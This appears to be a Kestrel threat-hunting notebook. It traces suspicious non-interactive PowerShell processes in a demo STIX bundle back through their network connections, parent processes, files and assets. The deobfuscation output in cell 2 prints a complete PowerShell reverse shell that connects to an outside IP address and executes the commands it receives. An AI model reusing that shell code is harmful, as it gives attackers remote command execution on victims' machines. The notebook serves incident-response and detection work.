In [1]:
# Find Windows shells launched non-interactively (i.e. not from explorer.exe)
procs = GET process FROM https://stix-bundles.s3.us-east.cloud-object-storage.appdomain.cloud/demo_bundle.json
        WHERE [process:binary_ref.name IN ('cmd.exe', 'powershell.exe') AND process:parent_ref.binary_ref.name != 'explorer.exe'] 

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,x-oca-asset*,x-oca-event*
procs,process,1,3,5,5,2,1,4,3,3,5


In [2]:
# Powershell deobfuscation analytic
APPLY python://psd on procs

Row 1: process--62ccf4b1-d62a-52dd-a682-37b3fcc9de65
 
 
$client = new-object system.net.sockets.tcpclient('152.89.196.54', 80);
$stream = $client.getstream();
[byte[]]$bytes = 0..65535 | % {
 0
}
while (($i = $stream.read($bytes, 0, $bytes.length)) -ne 0) {
 ;
 $data = ( new-object -typename system.text.asciiencoding).getstring($bytes, 0, $i);
 $sendback = (iex". { $data } 2>&1" | out-string );
 $sendback2 = $sendback + 'PS ' + (pwd).path + '> ';
 $sendbyte = ([text.encoding]::ascii).getbytes($sendback2);
 $stream.write($sendbyte, 0, $sendbyte.length);
 $stream.flush()
}
$client.close()

In [3]:
# Find the netconns created by powershell
conns = FIND network-traffic CREATED BY procs

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,x-oca-asset*,x-oca-event*
conns,network-traffic,1,1,3,3,2,0,3,2,2,3


In [4]:
# Apply Threat Intelligence Service (TIS) enrichment on those connections 
APPLY python://xfeenrich ON conns

In [5]:
# Find the process(es) that created those shells
parents = FIND process CREATED procs

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,x-oca-asset*,x-oca-event*
parents,process,1,4,9,9,2,1,8,5,5,11


In [7]:
# Look for any files touched by the parent process (i.e the ones that launched the shells)
files = FIND file LINKED parents

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,x-oca-asset*,x-oca-event*
files,file,5,15,17,12,4,2,16,9,9,25


In [ ]:
# Look up the hashes of those files
#APPLY tis-enrich ON files

In [8]:
# Filter those files looking for Word docs
susp_files = files WHERE name LIKE '%.docx'

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,x-oca-asset*,x-oca-event*
susp_files,file,0,0,0,0,0,0,0,0,0,0


In [9]:
# Find all my assets where this all happened
assets = FIND x-oca-asset LINKED procs

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,x-oca-asset*,x-oca-event*
assets,x-oca-asset,1,9,17,17,4,2,16,9,8,25


In [10]:
disp conns

dst_port,protocols,src_port,id,dst_ref.value,dst_ref.id,src_ref.value,src_ref.id
80,"[""ipv4"",""tcp""]",65311,network-traffic--5f0c1037-731c-5494-8f42-32a5e8d8ca36,152.89.196.54,ipv4-addr--b8cebe95-e8ae-5060-b2d8-6bcdccc65957,192.168.1.108,ipv4-addr--93aef2d0-9209-5529-96f0-d768d5b8e8b8
